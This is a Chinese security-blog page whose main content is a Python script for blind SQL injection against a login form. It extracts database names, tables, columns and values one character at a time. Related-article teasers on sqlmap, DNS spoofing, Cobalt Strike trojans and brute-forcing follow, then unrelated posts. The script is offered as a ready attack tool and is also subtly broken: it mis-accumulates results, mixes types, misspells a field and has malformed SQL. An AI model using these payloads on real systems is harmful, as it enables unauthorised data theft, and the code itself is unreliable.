import requests
import string
#mysql  手动注入 通用脚本 适用盲注 可以跟具自己的需求更改
def  home():
    url="url"
    list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?"
    s=requests.session()
    success = ""  # 成功返回的特征
    error="" #失败返回的体征

# 1.拿到当前连接数据库长度
    leng=0
    i=0
    while True:
        sql="admin%1$\\' or  length(database())>"+str(i)+"#"
        data={"username":sql,"passwrod":1}
        r=s.post(url,data=data).content
        if  error in r :
            leng=i
            i=0
            break
        i+=1
    print ("length the database:%d" %leng)

#2.拿到当前连接数据库名
    strs=''
    for t in range(leng):
        for l in list:
            sql="admin%1$\\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#"
            data = {"username": sql, "passwrod": 1}
            r=s.post(url,data=data).content
            if success in r:
                strs+=strs
                break
    print("database is :%s" % (strs))

#3.拿当前数据库里面的所有表
    #拿到数据库表添加的长度
    while True:
        sql="admin%1$\\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#"
        data = {"username": sql, "passwrod": 1}
        r = s.post(url, data=data).content
        if error in r:
            leng=i
            i=0
            break
        i+=1
    print("length table is :%s" % (leng))
    #返回所有表
    for t in range(leng):
        for l in list:
            sql = "admin%1$\\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#"
            data = {"username": sql, "passwrod": 1}
            r=s.post(url,data=data).content
            if success in r:
                strs+=strs
                break
    print("talbes is :%s" % (strs))
#4.选择先要查询的表  返回表所有字段
    #返回长度
    table='table'#要查找的表名
    tablename = '0x' + table.encode('hex')
    table_name = table
    while True:
        sql = "admin%1$\\' or select length(group_concat(column_name)) from information_schema.columns  where table_name='"+table_name+"' and table_schema=database()<" + i + "#"
        data = {"username": sql, "passwrod": 1}
        r = s.post(url, data=data).content
        if error in r:
            leng = i
            i = 0
            break
        i += 1
    print("length table is :%s" % (leng))
    # 返回所有表
    for t in range(leng):
        for l in list:
            sql = "admin%1$\\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str(
                t) + ",1))=" + str(ord(l)) + "#"
            data = {"username": sql, "passwrod": 1}
            r = s.post(url, data=data).content
            if success in r:
                strs += strs
                break
    print("talbes is :%s" % (strs))
# 5.返回相应字段里面的值
    num=0
    while True:
        sql = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
        data = {'username':sql,'password':1}
        r = s.post(url,data=data).content
        if error in r:
            num = i
            i=0
            break
        i+=1
        pass
    print("[+]number(column): %d" %(num))

    # 返回长度
    table = 'table'  # 要查找的表名
    col='user'#要返回的字段
    for t in range(leng):
        for l in list:
            sql = "admin%1$\\' or  ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#"
            data = {"username": sql, "passwrod": 1}
            r = s.post(url, data=data).content
            if success in r:
                strs += strs
                break
    print("talbes is :%s" % (strs))

从零开始学安全(三十五)●mysql 盲注手工自定义python脚本的更多相关文章

  1. 从零开始学安全(三十)●使用sqlmap对网站一步步渗透

    常规注入步骤第一步注入点-u "url" 判断是否是注入点 有就判断用户的权限第二步获取数据库 所有的 -u "url" --dbs第三步 查看应用程序所有数据 ...

  2. Python学习日记(三十五) Mysql数据库篇 三

    使用Navicate 创建一个连接去使用Mysql的数据库,连接名可以取任意字符但是要有意义 新增一个数据库 填写新数据库名,设置它的字符集和排序规则 新建一个表 增加表中的信息 点击保存再去输入表名 ...

  3. 三十五.MySQL读写分离 MySQL多实例 、MySQL性能调优

    1.实现MySQL读写分离 搭建一主一从结构 配置maxscale代理服务器 测试分离配置   1.1 搭建一主一从结构 192.168.4.51 主 192.168.4.52 从 测试OK   1. ...

  4. 从零开始学安全(四十五)●browser_autopwn2漏洞利用配合Ettercap工具实施DNS欺骗攻击

    系统:kali 2019  工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns ...

  5. 从零开始学安全(三十九)●FCK编辑器解析漏洞

    fck 现在存在漏洞的本版分别是 2.4.2 ,2.4.4,2.6.6 可以在 查看版本 2.4.2 在 图片域有上传点 2.4.4 这里有几个按钮,首先是 Get Folders and Files ...

  6. 从零开始学安全(三十八)●cobaltstrike生成木马抓肉鸡

    链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih  上面是工具 需要java jdk 在1.8.5 以上  实验环境windows ...

  7. 从零开始学安全(三十六)●利用python 爆破form表单

    import sys import requests from requests.auth import HTTPBasicAuth def Brute_Force_Web(postData): re ...

  8. 从零开始学安全(三十四)●百度杯 ctf比赛 九月场 sqli

    先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该 ...

  9. 从零开始学安全(二十五)●用nmap做端口扫描

    以上是常用的端口扫描 -T 用法 每个级别发包时间  当没有使用T 时默认的使用T3级别发包 半开扫描  先探测主机是否存活 再用-sS  扫描端口   容易造成syn 包攻击 就是利用僵尸主机  进 ...

随机推荐

  1. java课程之团队开发冲刺阶段1.2

    一.总结昨天进度 1.三个任务都已经实现 2.使用时间:四个小时左右 二.遇到的困难 1.对Android原生的侧拉任务栏不了解,导致使用的时候出现了一部分问题 三.今天任务规划 1.对之前的程序重新 ...

  2. 判断以xx开头的字符串

    public static void main(String[] args) { String str = "EAN_13,1534651"; String strHttp = & ...

  3. High Availability手册(2): 架构

    最底层是通信层corosync/openais 负责cluster中node之间的通信 上一层是Resource Allocation Layer,包含下面的组件: CRM Cluster Resou ...

  4. XML如何添加注释?

    注释以 <!-- 开始并以 --> 结束, 例如 <!--注释内容-->. 注释可以出现在文档序言中,包括文档类型定义 (DTD):文档之后:或文本内容中. 注释不能出现在属性 ...

  5. JSP的执行原理

    在一个JSP文件第一次被请求时,JSP引擎把该JSP文件转换成为一个Servlet.而这个引擎本身也是一个Servlet.JSP的运行过程如下所示: (1)JSP引擎先把该JSP文件转换成一个Java ...

  6. Python学习笔记【Supervisor】:使用Supervisor监控Tornado进程

    Linux常见应用服务配置模式nginx和supervisor:采用主配置文件+项目配置文件 安装(如果使用pip安装注意看是否需要指定使用python2版本) 第一步:在Linux中使用apt-ge ...

  7. [Swift]LeetCode158. 用Read4来读取N个字符II $ Read N Characters Given Read4 II

    The API: int read4(char *buf) reads 4 characters at a time from a file. The return value is the actu ...

  8. [Swift]LeetCode894. 所有可能的满二叉树 | All Possible Full Binary Trees

    A full binary tree is a binary tree where each node has exactly 0 or 2 children. Return a list of al ...

  9. python glob的安装和使用

    基本概念 glob是python自己带的一个文件操作相关模块,用它可以查找符合自己目的的文件,类似于Windows下的文件搜索,支持通配符操作.*,?,[]这三个通配符,*代表0个或多个字符,?代表一 ...

  10. Vue.js 动画

    transition 动画: 当插入或删除包含在 transition 组件中的元素时,Vue将会做以下处理:     1.自动嗅探目标元素是否应用了css过滤或动画,如果是,在恰当的时机添加/删除c ...